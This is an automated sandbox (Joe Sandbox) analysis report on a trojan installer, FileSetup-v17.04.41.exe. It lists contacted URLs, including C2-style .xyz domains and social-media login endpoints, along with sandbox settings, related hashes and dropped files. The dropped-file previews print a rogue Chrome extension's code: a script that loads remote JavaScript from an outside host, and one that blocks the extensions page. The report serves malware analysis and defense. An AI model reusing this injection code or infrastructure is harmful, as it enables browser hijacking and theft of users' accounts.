                                                  https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://84CFBA021A5A6662.xyz/xet(6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.messenger.com/origin:6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drfalse
                                                        		high
                                                        http://pki.goog/gsr2/GTS1O1.crt0ecvAA35.tmp.11.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvAA35.tmp.11.drfalse
                                                          		high
                                                          https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvAA35.tmp.11.drfalse
                                                            		high
                                                            https://contextual.media.net/ecvAA35.tmp.11.drfalse
                                                              		high
                                                              http://ocsp.pki.goog/gsr202ecvAA35.tmp.11.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://pki.goog/repository/0ecvAA35.tmp.11.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.twitter.com/1.1/statuses/update.json6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvAA35.tmp.11.drfalse
                                                                  		high
                                                                  http://www.msn.com/ecvAA35.tmp.11.drfalse
                                                                    		high
                                                                    https://upload.twitter.com/i/media/upload.json6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvAA35.tmp.11.drfalse
                                                                        		high
                                                                        https://twitter.com/compose/tweetsec-fetch-mode:6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://84CFBA021A5A6662.xyz/info_old/w6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmpfalse
                                                                            		unknown
                                                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674ecvAA35.tmp.11.drfalse
                                                                              		high
                                                                              https://www.messenger.com/accept:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvAA35.tmp.11.drfalse
                                                                                  		high
                                                                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvAA35.tmp.11.drfalse
                                                                                    		high
                                                                                    https://contextual.media.net/48/nrrV18753.jsecvAA35.tmp.11.drfalse
                                                                                      		high
                                                                                      http://crl.pki.goog/gsr2/gsr2.crl0?ecvAA35.tmp.11.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://84CFBA021A5A6662.xyz/info_old/g6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpfalse
                                                                                        		unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)ecvAA35.tmp.11.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=06852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://feedback.googleusercontent.com6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://fsfba021a5a6662.xyz/6852B33702F6B3BD.exe, 00000005.00000002.289473954.000000000087B000.00000004.00000020.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.xunlei.com/download_engine.dll.4.drfalse
                                                                                              		high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0#ecvAA35.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthecvAA35.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://84CFBA021A5A6662.xyz/info_old/wN6852B33702F6B3BD.exe, 00000005.00000002.289494170.0000000000893000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.4.drfalse
                                                                                                  		high
                                                                                                  https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvAA35.tmp.11.drfalse
                                                                                                    		high
                                                                                                    http://84cfba021a5a6662.xyz/FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvAA35.tmp.11.drfalse
                                                                                                      		high
                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvAA35.tmp.11.drfalse
                                                                                                        		high
                                                                                                        https://curl.haxx.se/docs/http-cookies.html6852B33702F6B3BD.exe, 00000004.00000002.386867102.000000000340F000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://84CFBA021A5A6662.xyz/g6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.openssl.org/support/faq.htmlFileSetup-v17.04.41.exefalse
                                                                                                            		high
                                                                                                            https://www.instagram.comsec-fetch-mode:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.instagram.com/accounts/login/ajax/facebook/6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecvAA35.tmp.11.drfalse
                                                                                                                		high
                                                                                                                http://crl.thawte.com/ThawteTimestampingCA.crl0FileSetup-v17.04.41.exefalse
                                                                                                                  		high
                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecvAA35.tmp.11.drfalse
                                                                                                                    		high
                                                                                                                    https://www.instagram.com/sec-fetch-site:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://twitter.comReferer:6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.interestvideo.com/video1.php6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://config.i.duba.net/lminstall/%d.json?time=%dcheckinstallSOFTWAREFileSetup-v17.04.41.exefalse
                                                                                                                        		high
                                                                                                                        https://www.instagram.com/accept:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://84CFBA021A5A6662.xyz/info_old/w&FileSetup-v17.04.41.exe, 00000001.00000002.261142777.0000000000811000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://84CFBA021A5A6662.xyz/info_old/w%6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.messenger.com/login/nonce/6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.youtube.com6852B33702F6B3BD.exefalse
                                                                                                                              		high
                                                                                                                              https://twitter.com/compose/tweetsec-fetch-dest:6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crl.pki.goog/GTSGIAG3.crl0ecvAA35.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtecvAA35.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown

                                                                                                                                Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                104.21.23.16
                                                                                                                                		unknownUnited States
                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                Private

                                                                                                                                IP
                                                                                                                                192.168.2.1
                                                                                                                                127.0.0.1

                                                                                                                                General Information

                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                Analysis ID:345937
                                                                                                                                Start date:29.01.2021
                                                                                                                                Start time:10:56:38
                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                Overall analysis duration:0h 13m 24s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Sample file name:FileSetup-v17.04.41.exe
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                Run name:Run with higher sleep bypass
                                                                                                                                Number of analysed new started processes analysed:40
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • HDC enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal90.bank.troj.spyw.evad.winEXE@32/37@4/3
                                                                                                                                EGA Information:Failed
                                                                                                                                HDC Information:
                                                                                                                                • Successful, ratio: 99.5% (good quality ratio 94.4%)
                                                                                                                                • Quality average: 79.8%
                                                                                                                                • Quality standard deviation: 27.4%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 61%
                                                                                                                                • Number of executed functions: 83
                                                                                                                                • Number of non-executed functions: 300
                                                                                                                                Cookbook Comments:
                                                                                                                                • Adjust boot time
                                                                                                                                • Enable AMSI
                                                                                                                                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                Warnings:
                                                                                                                                Show All
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 23.210.248.85, 51.104.144.132, 67.27.158.254, 8.248.139.254, 8.248.133.254, 8.253.204.121, 8.241.121.126, 95.101.22.224, 95.101.22.216, 8.253.204.120, 67.27.159.254, 67.27.157.126, 8.241.122.254, 8.241.122.126, 51.103.5.186, 20.54.26.129, 51.132.208.181, 52.155.217.156
                                                                                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                No simulations

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                104.21.23.16FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                • 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                84cfba021a5a6662.xyzFileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.23.16

                                                                                                                                ASN

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                CLOUDFLARENETUSRddH6rLRfH.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                Immuni.apkGet hashmaliciousBrowse
                                                                                                                                • 172.64.100.5
                                                                                                                                FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.23.16
                                                                                                                                UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                                • 104.20.184.68
                                                                                                                                4PDNbYK5fj.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                pmTdQ57tvM.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                7BtV39hziI.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                dc4AaqW6Aa.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                lAy87VNPiL.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                97aa4Ywd9y.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                wuRBlQt0Tz.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                4GRuinub4a.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                v8c1m9dW8G.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                XQx9brj85p.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.169.213
                                                                                                                                j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                • 104.16.16.194
                                                                                                                                k5K4BcM1b5.exeGet hashmaliciousBrowse
                                                                                                                                • 66.235.200.5
                                                                                                                                J0nUka7d5M.exeGet hashmaliciousBrowse
                                                                                                                                • 104.21.27.240
                                                                                                                                Swift_Confirmation.exeGet hashmaliciousBrowse
                                                                                                                                • 162.159.130.233
                                                                                                                                VolP-Byungil.lim.HTMGet hashmaliciousBrowse
                                                                                                                                • 104.16.18.94
                                                                                                                                order.exeGet hashmaliciousBrowse
                                                                                                                                • 172.67.188.154

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                C:\Users\user\AppData\Local\Temp\MSI61C2.tmpFileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                  C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeFileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\download\atl71.dllFileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                      C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeFileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                        C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Cookies1611946677837
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.6970840431455908
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                          MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                          SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                          SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                          SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Cookies1611946694149
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.6970840431455908
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                          MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                          SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                          SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                          SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\background.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):886
                                                                                                                                          Entropy (8bit):5.022683940423506
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                          MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                          SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                          SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                          SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\book.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):152
                                                                                                                                          Entropy (8bit):5.039480985438208
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                          MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                          SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                          SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                          SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon.png
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161
                                                                                                                                          Entropy (8bit):7.79271055262892
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                          MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                          SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                          SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                          SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon48.png
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2235
                                                                                                                                          Entropy (8bit):7.880518016071819
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                          MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                          SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                          SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                          SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                          Malicious:false
